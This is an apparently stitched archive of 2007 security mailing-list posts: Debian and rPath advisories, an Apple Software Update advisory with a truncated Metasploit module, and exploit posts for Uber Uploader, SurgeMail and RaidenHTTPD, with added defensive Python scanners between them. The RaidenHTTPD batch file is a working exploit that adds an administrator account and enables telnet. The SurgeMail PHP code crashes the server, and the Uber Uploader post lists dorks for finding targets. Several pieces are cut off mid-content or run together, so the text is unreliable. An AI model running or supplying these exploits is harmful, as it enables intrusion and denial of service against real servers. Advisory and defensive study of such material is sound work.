rPSA-2007-0268-1 kdebase
rPath Security Advisory: 2007-0268-1
Published: 2007-12-17
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local Deterministic Denial of Service
Updated Versions:
[EMAIL PROTECTED]:1/3.4.2-3.15-1

rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1992
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5963

Description:
Previous versions of the kdebase package are vulnerable to Denials of Service in which a local user can render KDM unusable for logins by any user or cause KDM to exceed system resource limits. In its default configuration, rPath Linux 1 is not vulnerable to the Denial of Service against KDM logins.

http://wiki.rpath.com/Advisories:rPSA-2007-0268

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
Apple OS X Software Update Remote Command Execution
- Apple Mac OS X Software Update Remote Command Execution Vulnerability
Copyright (c) 2007 Moritz Jodeit <[EMAIL PROTECTED]> (2007/12/17)

I. Vulnerability Description

The OS X Software Update mechanism uses so called `distribution packages' [1], which basically consist of two parts: the XML `catalog file', which lists the available updates, and the `distribution definition files' [1], which contain information encoded in XML and JavaScript, defining every aspect of the user experience when installing an update.

When OS X checks for new updates, it first contacts swscan.apple.com to receive the XML catalog file. This file references the distribution definition files, which can reside on another server. Software Update receives these files and calls some of the JavaScript functions to check if the update is suited for the local machine.

The catalog file and the distribution definition files are both received using HTTP without any authentication. By running a malicious update server, it is possible to provide distribution definition files which execute arbitrary commands using JavaScript on the remote machine requesting the update. The System.run() method can be used for this, if the `allow-external-scripts' option was set in the distribution definition file, as documented in the "Installer JavaScript Reference" [2].

[1] http://developer.apple.com/documentation/DeveloperTools/Reference/DistributionDefinitionRef/
[2] http://developer.apple.com/documentation/DeveloperTools/Reference/InstallerJavaScriptRef/

II. Impact

Combined with the ability to intercept requests to the official Apple update server by other means like ARP or DNS spoofing, it is possible to execute arbitrary commands on all clients requesting updates. OS X automatically checks for updates at regular intervals (default is weekly), which allows for exploitation even without any user intervention.

III. Solution

This vulnerability was fixed with the latest Apple update APPLE-SA-2007-12-17.

IV. Vendor Response

2007/12/06 Initial contact with <[EMAIL PROTECTED]>
2007/12/06 Acknowledgement of received report
2007/12/12 Agreement on public release date
2007/12/17 Coordinated release of updates and advisory

V. Proof Of Concept

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf

class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote

	include Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple OS X Software Update Command Execution',
			'Description'    => %q{
				This module exploits a feature in the Distribution Packages,
				which are used in the Apple Software Update mechanism. This
				feature allows for arbitrary command execution through
				JavaScript. This exploit provides the malicious update server.
				Requests must be redirected to this server by other means for
				this exploit to work.
			},
			'Author'         => [ 'Moritz Jodeit <[EMAIL PROTECTED]>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2007-5863'],
				],
			'Payload'        =>
				{
					'BadChars'    => "\x00",
					'DisableNops' => true,
				},
			'Platform'       => 'osx',
			'Targets'        =>
				[
					[ 'Automatic',
						{
							'Platform' => [ 'unix' ],
							'Arch'     => ARCH_CMD,
						},
					],
				],
			'DisclosureDate' => 'Dec 17 2007',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
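The advisory's precondition is a specific pair of features in one file: `allow-external-scripts' switched on in the distribution definition's options element, plus a System.run() call in its JavaScript. As an added example (not part of Moritz Jodeit's advisory and not the Metasploit module above), the following Python parses a distribution definition file and reports that combination, which is what an analyst would check in a captured update before deciding whether a client that fetched it over plain HTTP could have run attacker-chosen commands. The sample file is constructed for this example; its element names follow the Distribution Definition Reference cited above, and the exact shape of real Apple update definitions is assumed rather than taken from the advisory.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample distribution definition, modelled on the element names in
# Apple's Distribution Definition Reference (installer-gui-script, options,
# script, choices-outline, pkg-ref). The layout of real Apple update definitions
# is an assumption; only the two features that matter are taken from the
# advisory: allow-external-scripts and the System.run() call.
SAMPLE_DIST = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
    <title>Security Update 2007-009</title>
    <options allow-external-scripts="yes" customize="never"/>
    <script>
    function volumeCheck() {
        /* looks like a routine compatibility check ... */
        return true;
    }
    function installationCheck() {
        /* ... but this one runs a command on the client that fetched the file */
        system.run('/bin/sh', '-c', 'id > /tmp/pwned');
        return true;
    }
    </script>
    <choices-outline>
        <line choice="update"/>
    </choices-outline>
    <choice id="update" title="Update">
        <pkg-ref id="com.example.update"/>
    </choice>
    <pkg-ref id="com.example.update" version="1.0">#update.pkg</pkg-ref>
</installer-gui-script>
"""

# The advisory writes System.run(); the Installer JavaScript global is usually
# written in lower case, so match case-insensitively and tolerate whitespace.
RUN_CALL = re.compile(r"\bsystem\s*\.\s*run\s*\(", re.IGNORECASE)
FUNC_DEF = re.compile(r"\bfunction\s+(\w+)\s*\(")


def scan_distribution(xml_text):
    """Inspect one distribution definition and report the dangerous combination.

    Returns a dict with:
      allow_external_scripts  True if <options allow-external-scripts="yes"/> is set
      run_calls               list of (enclosing JS function, matched text)
      dangerous               True only when both hold, i.e. a client that trusts
                              this file can be made to execute commands
    """
    root = ET.fromstring(xml_text)
    findings = {"allow_external_scripts": False, "run_calls": [], "dangerous": False}

    opts = root.find("options")
    if opts is not None and opts.get("allow-external-scripts", "no").lower() == "yes":
        findings["allow_external_scripts"] = True

    for script in root.iter("script"):
        body = script.text or ""
        for match in RUN_CALL.finditer(body):
            # Attribute the call to the last function defined before it, for the report.
            enclosing = "<top level>"
            for fdef in FUNC_DEF.finditer(body, 0, match.start()):
                enclosing = fdef.group(1)
            findings["run_calls"].append((enclosing, match.group(0)))

    findings["dangerous"] = findings["allow_external_scripts"] and bool(findings["run_calls"])
    return findings


if __name__ == "__main__":
    result = scan_distribution(SAMPLE_DIST)
    for fn, call in result["run_calls"]:
        print(f"{fn}: {call}")
    print("allow-external-scripts:", result["allow_external_scripts"])
    print("can execute commands on the client:", result["dangerous"])
```

The scanner is a triage aid for captured update traffic, not a fix: a definition without a run call can still misbehave through other script features, and the root cause the advisory names is that both the catalog and the definition files arrive over unauthenticated HTTP, so the durable control is integrity of the transport and of the package, not content inspection.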
Uber Uploader <= 5.3.6 Remote File Upload Vulnerability
# Uber Uploader <= 5.3.6 Remote File Upload Vulnerability
# Download:
# http://sourceforge.net/projects/uber-uploader
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure

.vuln/
There isn't any kind of file extension check in: "uu_file_upload.js" and "uber_uploader_file.js".

.extensions/
You can submit files with extensions like: .html, .txt, .asp, etc...
You can upload all extensions, except: sh, php, php3, php4, php5, py, shtml, phtml, cgi, pl, plx, htaccess, htpasswd.

.PoC/
http://www.localhost/uu_file_upload.php
http://www.localhost/uber_uploader_file.php

.deface/
Once the file is uploaded you can see it in /uploads/
http://www.localhost/uploads/[YourFile]

.fixed/
To fix it, you have to modify "Check for illegal file extentions" and "Check for legal file extentions" in the file "uu_file_upload.js" or "uber_uploader_file.js". It doesn't go on if it's different to the allowed extensions.

[code]
// Check for illegal file extentions
function checkAllowFileExtensions(){
	if(!check_allow_extensions){
		return true;
	}
	else{
		alert('Sorry, uploading a file with the extension "' + file_extension + '" is not allowed.');
		return true;
	}
}

// Check for legal file extentions
function checkAllowFileExtensions(){
	if(!check_allow_extensions){
		return false;
	}
	else{
		alert('Sorry, uploading a file with the extension "' + file_extension + '" is not allowed.');
		return true;
	}
}
[/code]

.dork/
"Powered By Uber Uploader"
allinurl: uu_file_upload.php
allinurl: uber_uploader_file.php

//---\\
Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández
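The checks JosS points at live in client-side JavaScript, which an attacker never has to execute, and a denylist accepts whatever it does not name: .html for stored script, double extensions such as shell.php.jpg, or a trailing dot that some servers strip back to shell.php. As an added example (not JosS's code and not part of Uber Uploader), this Python re-implements the denylist from the advisory next to a server-side allowlist check and runs both over constructed filenames. The allowlist contents are an assumption; the real one should be whatever the application actually needs to accept.

```python
import os
import re

# Denylist exactly as the advisory reports it for Uber Uploader 5.3.6.
DENYLIST = {"sh", "php", "php3", "php4", "php5", "py", "shtml", "phtml",
            "cgi", "pl", "plx", "htaccess", "htpasswd"}

# Allowlist for the hardened check (an assumption: whatever the site really needs).
ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf"}


def denylist_check(filename):
    """The original approach: accept anything whose last extension is not listed.
    In the product this runs in the browser and can simply be skipped."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DENYLIST


def safe_upload_name(filename):
    """Server-side allowlist: return the name to store, or None to reject.

    Rejects NUL bytes, directory components, names with more than one dot
    (shell.php.jpg), trailing dots/spaces (shell.php. becomes shell.php on
    Windows), and any extension not in ALLOWLIST. The base name is limited to a
    conservative character set so it is safe to reuse in a path or URL.
    """
    if "\x00" in filename:
        return None
    name = os.path.basename(filename.replace("\\", "/")).strip().rstrip(". ")
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return None
    base, ext = parts[0], parts[1].lower()
    if ext not in ALLOWLIST or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", base):
        return None
    return f"{base}.{ext}"


# Constructed test names: a legitimate upload, the .html/.asp cases from the
# advisory, and the usual denylist bypasses.
SAMPLES = ["photo.jpg", "page.html", "a.asp", "shell.php", "shell.PHP",
           "shell.php.jpg", "shell.php.", "shell.php\x00.jpg", "../evil.png"]


def compare(samples=SAMPLES):
    """Map each name to (accepted by the denylist, name stored by the allowlist or None)."""
    return {s: (denylist_check(s), safe_upload_name(s)) for s in samples}


if __name__ == "__main__":
    for name, (deny_ok, stored) in compare().items():
        verdict = "accept" if deny_ok else "reject"
        print(f"{name!r:24} denylist={verdict:7} allowlist={stored}")
```

Whatever name survives the check, store it under a server-chosen path outside the web root or in a directory with script execution disabled; the extension check alone does not stop a browser from interpreting an uploaded file as HTML.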
[SECURITY] [DSA 1432-1] New link-grammar packages fix execution of code
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1432-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                               Steve Kemp
December 16, 2007                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : link-grammar
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2007-5395
Debian Bug     : 450695

Alin Rad Pop discovered that link-grammar, Carnegie Mellon University's link grammar parser for English, performed insufficient validation within its tokenizer, which could allow a malicious input file to execute arbitrary code.

For the stable distribution (etch), this problem has been fixed in version 4.2.2-4etch1.

For the old stable distribution (sarge), this package was not present.

For the unstable distribution (sid), this problem was fixed in version 4.2.5-1.

We recommend that you upgrade your link-grammar package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2.orig.tar.gz
    Size/MD5 checksum:   742163 798c165b7d7f26e60925c30515c45782
  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1.dsc
    Size/MD5 checksum:      669 535a962c3aefbf92b3d09bd9355d3b57
  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1.diff.gz
    Size/MD5 checksum:     8231 fa03dfbb7a2e0a47130c9f1385eb48d3

Architecture independent packages:

  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar-dictionaries-en_4.2.2-4etch1_all.deb
    Size/MD5 checksum:   267530 52ef5d6278b5f8a5a0c0894b3d99235e

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_alpha.deb
    Size/MD5 checksum:   169386 f866bf37b179cf8f1c31f13b0ab9100a
  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_alpha.deb
    Size/MD5 checksum:        1 14b288d946738d5eefed5dc50e84040f
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_alpha.deb
    Size/MD5 checksum:   108456 826d5896c36850255bedfcc3b70a8ea1

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_amd64.deb
    Size/MD5 checksum:    16038 ea80489f9db4f247d5009bf435f40707
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_amd64.deb
    Size/MD5 checksum:    95996 0851ea02bd3b4b600d68df09016915cf
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_amd64.deb
    Size/MD5 checksum:   127934 a43908000f552820cdcd2c1a7819f62f

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_arm.deb
    Size/MD5 checksum:    15074 5a881ae17e13efc9ae731b9f86d7a0ff
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_arm.deb
    Size/MD5 checksum:   110896 54d4534ce7a06ed675d9c4d2c957e519
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_arm.deb
    Size/MD5 checksum:    87732 5dfce7e3245ab16bbab0f2325d462192

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_hppa.deb
    Size/MD5 checksum:    16202 3f8cbe2ab057f5d3b387c1e52e4e9e51
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_hppa.deb
    Size/MD5 checksum:   139488 2411aae738f8467e4180debc87b265ee
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_hppa.deb
    Size/MD5 checksum:   104292 105899d1fa1a37a2690a6d3372572912

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_i386.deb
    Size/MD5 checksum:    15458 9b43845e6fdb26319c4dd3d88afe5fb4
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_i386.deb
    Size/MD5 checksum:    89456 ffa178b41a336d1a9e11bca02a3d2232
  http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_i386.deb
    Size/MD5 checksum:   111356 50b911abcf
SurgeMail v.38k4 webmail Host header crash
http://192.168.0.1";;
// str_repeat() casts 0xff to the string "255", so this is a ~12 KB Host header
$puf=str_repeat(0xff,0xfff);
$header ="POST / HTTP/1.0\r\n";
$header.="Host: $puf\r\n";
$header.="Connection: Close\r\n\r\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
// the raw request is handed to curl as the "method", so it goes out verbatim
// ahead of curl's own request line
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);
$data = curl_exec($ch);
if (curl_errno($ch)) {
	print curl_error($ch)."\n";
} else {
	curl_close($ch);
}
?>

original url: http://retrogod.altervista.org/rgod_surgemail_crash.html
RaidenHTTPD 2.0.19 ulang cmd exec poc exploit
rem raidenhttpdudo.cmd
@echo off
color 0a
rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit
rem WebAdmin one - not enabled by default anymore
rem however works regardless of php.ini, because
rem "ulang" comes from $_GET[] and some magic_quo
rem tes_gpc disable code,lame divertissement one
rem to demonstrate an unauthenticated directory
rem traversal ...
rem rgod --http://violentcop.splinder.com
if {%1}=={} goto kill
echo HEAD /?^ HTTP/1.1>in
echo Host: %1>>in & echo Connection: Close>>in & echo.>>in
nc %1 80 -v -w1< in > nul
echo ..\..\..\logs\access_%date:~6,4%-%date:~3,2%-%date:~0,2%.log%%00> puf & set /p exploit=< puf
echo GET /raidenhttpd-admin/workspace.php?CMD=cmd.exe+%%2Fc+net+user+sun+tzu+%%2Fadd+%%26+net+localgroup+Administrators+sun+%%2Fadd+%%26+sc+config+NtLmSsp+start%%3D+auto+%%26+sc+config+RpcSs+start%%3D+auto+%%26+net+start+RpcSs+%%26+net+start+NtLmSsp+%%26+sc+config+TlntSvr+start%%3D+auto+%%26+net+start+TlntSvr+%%26+netsh+firewall+add+portopening+tcp+23+sh+%%26+echo+REGEDIT4+%%3E+sh.reg+%%26+echo+%%5BHKEY_LOCAL_MACHINE%%5CSYSTEM%%5CCurrentControlSet%%5CControl%%5CLsa%%5D+%%3E%%3E+sh.reg+%%26+echo+%%22forceguest%%22%%3Ddword%%3A+%%3E%%3E+sh.reg+%%26+regedit+%%2FS+sh.reg^&ulang=%exploit% HTTP/1.1> in
echo Host: %1>>in & echo Connection: Close>>in & echo.>>in
echo please wait ...
nc %1 80 -v -w1< in > nul
ping localhost -n 15>nul & rem delaying ...
del puf
del in
telnet %1 23
goto nowhere
:kill
echo %0 [target-host]
:nowhere

original url: http://retrogod.altervista.org/rgod_raidenhttpdudo.html
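rgod's batch file chains two steps: a first request whose path ends up in the server's access log (the archived request line reads `HEAD /?^ HTTP/1.1`, with whatever followed the `^` escape missing), then a `ulang` value that walks out of the language directory with `..\` and ends in `%00`, so that anything the script appends after the parameter is discarded when the file is opened. As an added example (not rgod's code and not RaidenHTTPD's), the following Python models that include-path bug beside a hardened resolver and a log-review helper. The install path `C:\RaidenHTTPD\webadmin\lang` and the appended `.php` suffix are assumptions made for the model; the post does not give them.

```python
import ntpath
import re
from urllib.parse import unquote

# Assumed location of the language files on the target (hypothetical; the
# real RaidenHTTPD layout is not given in the post).
LANG_DIR = r"C:\RaidenHTTPD\webadmin\lang"

# The ulang value the batch file sends, after the server URL-decodes it. The
# date part is what %date:~6,4%-%date:~3,2%-%date:~0,2% expands to on the day
# of the post; %00 becomes a real NUL byte once decoded.
PAYLOAD = unquote("..%5C..%5C..%5Clogs%5Caccess_2007-12-17.log%00")


def vulnerable_lang_path(ulang, lang_dir=LANG_DIR):
    """Model of the bug: the parameter goes straight into the include path.

    The ".php" suffix is an assumption about what the application appends; the
    %00 in the exploit only makes sense if something is appended. C-string file
    APIs stop at the first NUL, so the suffix is silently dropped.
    """
    raw = lang_dir + "\\" + ulang + ".php"
    seen_by_open = raw.split("\x00", 1)[0]
    return ntpath.normpath(seen_by_open)


LANG_CODE = re.compile(r"[a-z]{2}(?:_[A-Z]{2})?")   # en, de, pt_BR, ...


def safe_lang_path(ulang, lang_dir=LANG_DIR):
    """Hardened resolver: validate the token, then prove the result is inside lang_dir."""
    if "\x00" in ulang or "/" in ulang or "\\" in ulang:
        return None
    if not LANG_CODE.fullmatch(ulang):
        return None
    candidate = ntpath.normpath(ntpath.join(lang_dir, ulang + ".php"))
    # Belt and braces: even a valid-looking token must resolve under lang_dir.
    if ntpath.commonpath([candidate, lang_dir]).lower() != lang_dir.lower():
        return None
    return candidate


def looks_like_traversal(raw_query_value):
    """Log-review helper: flag encoded or literal traversal and NUL in a query value."""
    decoded = unquote(raw_query_value)
    return ("\x00" in decoded) or ("../" in decoded) or ("..\\" in decoded)


if __name__ == "__main__":
    print("vulnerable resolves to:", vulnerable_lang_path(PAYLOAD))
    print("hardened resolves to:  ", safe_lang_path(PAYLOAD))
    print("hardened, valid input: ", safe_lang_path("en"))
```

The allowlist on the token is what actually closes the hole; the commonpath check is a second line of defence for the day someone loosens the pattern. Note that including the access log is only useful because the earlier request put attacker-controlled text into it, which is why log files should never be reachable from an include path.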
rPSA-2007-0266-1 tetex tetex-afm tetex-dvips tetex-fonts tetex-latex tetex-xdvi
rPath Security Advisory: 2007-0266-1
Published: 2007-12-17
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1

rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1928
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5935
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5936
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5937

Description:
Previous versions of the tetex package are vulnerable to multiple attacks, the most serious of which allow user-assisted attackers to execute arbitrary code when dvips or dviljk are run on maliciously crafted DVI files.

http://wiki.rpath.com/Advisories:rPSA-2007-0266

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
Heap overflow in PeerCast 0.1217
###

Luigi Auriemma

Application:  PeerCast
              http://www.peercast.org
Versions:     <= 0.1217 and SVN <= 344
Platforms:    Windows, plugin for Winamp, Linux and Mac
Bug:          heap overflow
Exploitation: remote
Date:         17 Dec 2007
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    aluigi.org

###

1) Introduction
2) Bug
3) The Code
4) Fix

###

=== 1) Introduction ===

PeerCast is a multi platform open source software for peer2peer radio streaming.
The broadcasters are visible at http://yp.peercast.org

###

== 2) Bug ==

The handshakeHTTP function which handles all the requests received by the other clients is vulnerable to a heap overflow which allows an attacker to fill the loginPassword and loginMount buffers located in the Servent class with how much data he wants.

From servhs.cpp:

void Servent::handshakeHTTP(HTTP &http, bool isHTTP)
{
	char *in = http.cmdLine;
	...
	}else if (http.isRequest("SOURCE"))
	{
		if (!isAllowed(ALLOW_BROADCAST))
		...
		mount = in+strlen(in);
		while (*--mount)
			if (*mount == '/')
			{
				mount[-1] = 0;	// password preceeds
				break;
			}
		strcpy(loginPassword,in+7);
		..
		if (mount)
			strcpy(loginMount,mount);
	...

ALLOW_BROADCAST ("allowBroadcast" in peercast.ini) is enabled by default.

###

=== 3) The Code ===

http://aluigi.org/poc/peercasthof.zip

###

== 4) Fix ==

Version 0.1218 or SVN 347

###

---
Luigi Auriemma
http://aluigi.org
Re: Wordpress - Broken Access Control
The is_admin() function is not supposed to tell whether a user is an administrator or not, it tells whether the user is looking at one of the administration pages. As such, this function does exactly what it is supposed to do. As for the rest, there is no flaw. To view a draft, the user must authenticate and have the correct capability set. There is no way to view drafts without being logged in and having that capability set on the user's role level. This "vulnerability" is non-existent.
release uhooker v1.3
What's uhooker?:
A tool to intercept and manipulate execution of programs. It enables the user to insert hooks in function calls and arbitrary addresses within the executable file in memory. The hook handlers are written in Python and can be changed at runtime without the need to restart the inspected process.

Download:
http://oss.coresecurity.com/uhooker/release/1.3/uhooker_v1.3.tgz
http://oss.coresecurity.com/uhooker/release/1.3/uhooker_v1.3.zip

more info:
http://oss.coresecurity.com/projects/uhooker.htm
http://oss.coresecurity.com/uhooker/doc/index.html

Some Videos:
http://oss.coresecurity.com/uhooker/doc/uhooker_changeconnect.wmv
http://oss.coresecurity.com/uhooker/doc/uhooker_sendhex.wmv

What's new in uhooker v1.3?
===========================

-Several bug fixes, everything should work better than before :)
-Fixed bug with readunicode() API where reading empty multibyte strings resulted in the plugin freezing for ever.
-Now you can load multiple .CFG files (load one, then load another to hook something else, etc). Previously, you were only allowed to load one .CFG file with breakpoints/handlers definitions. Now you can load as many as you like whenever you want.
-If a .CFG file overlaps previously set hooks, you have the chance to redefine them (for example, you can dynamically change the file/function handling the breakpoint. This adds to the feature present since the first version of uhooker that allows runtime rewriting of the handler's code).
-Errors in the code of the handlers (written in Python) are now correctly handled. Previously, if you had an error in the code you wrote to handle a certain breakpoint, this caused the 'uhooker's python server' to 'crash', and you needed to restart your debugging session all over again. This scenario was very common, particularly if you were developing your own handler/script for the first time, or if you were modifying at runtime the code of a handler/script. Well, no more! :) Now if you have an error (syntax error, indentation error, general programming error, etc), the error that your handler has will be displayed on the uhooker's console, and you'll be able to recover from that error. This improvement means:
  1-If an error occurs in the code, you don't need to restart the debugger's session (and lose the state of the program, etc.).
  2-If you are changing at runtime the code of the handler, and you make a mistake, you'll see what caused the error, and you can fix the script/handler and move on!
-and there are probably more things but I didn't write them down and now I don't remember :).
[SECURITY] [DSA 1434-1] New mydns packages fix denial of service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1434-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                          Thijs Kinkhorst
December 16, 2007                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : mydns
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2007-2362

It was discovered that in MyDNS, a domain name server with database backend, the daemon could be crashed through malicious remote update requests, which may lead to denial of service.

For the stable distribution (etch), this problem has been fixed in version 1:1.1.0-7etch1.

The old stable distribution (sarge) is not affected.

For the unstable distribution (sid), this problem has been fixed in version 1.1.0-8.

We recommend that you upgrade your mydns packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.dsc
    Size/MD5 checksum:     1016 6d0a22d23d6a218b2f6c36a0973fec29
  http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.diff.gz
    Size/MD5 checksum:    23201 68288d6559240f652b363175077ee372

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_alpha.deb
    Size/MD5 checksum:   283646 605abae7c94de5d29b3c0b2e627ba3de
  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_alpha.deb
    Size/MD5 checksum:   276524 2ba115052634baec10286c91a5cc6ce6

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_amd64.deb
    Size/MD5 checksum:   261562 fb735c256a150474a83b162823817666
  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_amd64.deb
    Size/MD5 checksum:   254146 57ff5991069034d7c97be430b8149aaa

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_arm.deb
    Size/MD5 checksum:   244500 8361e2dfe50de8abb41d97c0bde6c8fa
  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_arm.deb
    Size/MD5 checksum:   233926 3410cf9b02fea32800f7273b0db312c3

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_hppa.deb
    Size/MD5 checksum:   259956 dd54add61133e98ca326ffbba9d45491
  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_hppa.deb
    Size/MD5 checksum:   267084 d457000b6afc8dcf160e06f91e5449d8

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_i386.deb
    Size/MD5 checksum:   249396 a0d5f307f3eedfc6c85a587cc5572463
  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_i386.deb
    Size/MD5 checksum:   241112 a2ef881adaf58f206315b6843f6e0f0f

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_ia64.deb
    Size/MD5 checksum:   336738 80c0da6e223de21d5d13ee34667c17ec
  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_ia64.deb
    Size/MD5 checksum:   342716 4f95f73ebe81ae596edeae7145a55be9

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_mips.deb
    Size/MD5 checksum:   257376 e607aff2b4d31066337d10a6168831a8
  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_mips.deb
    Size/MD5 checksum:   264792 c1f711aa974118740dd077078004a0bc

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_mipsel.deb
    Size/MD5 checksum:   257854 10b2f0d2ad613f24d9a1a316fd5c3699
  http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_mipsel.deb
    Size/MD5 checksum:   265208 ec23fa6fb9fcd9c2422ff61838b65a04

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_powerpc.deb
    Size/MD5 checksum:   257796 7e94fa5255766b49edf123c1e1546aa0
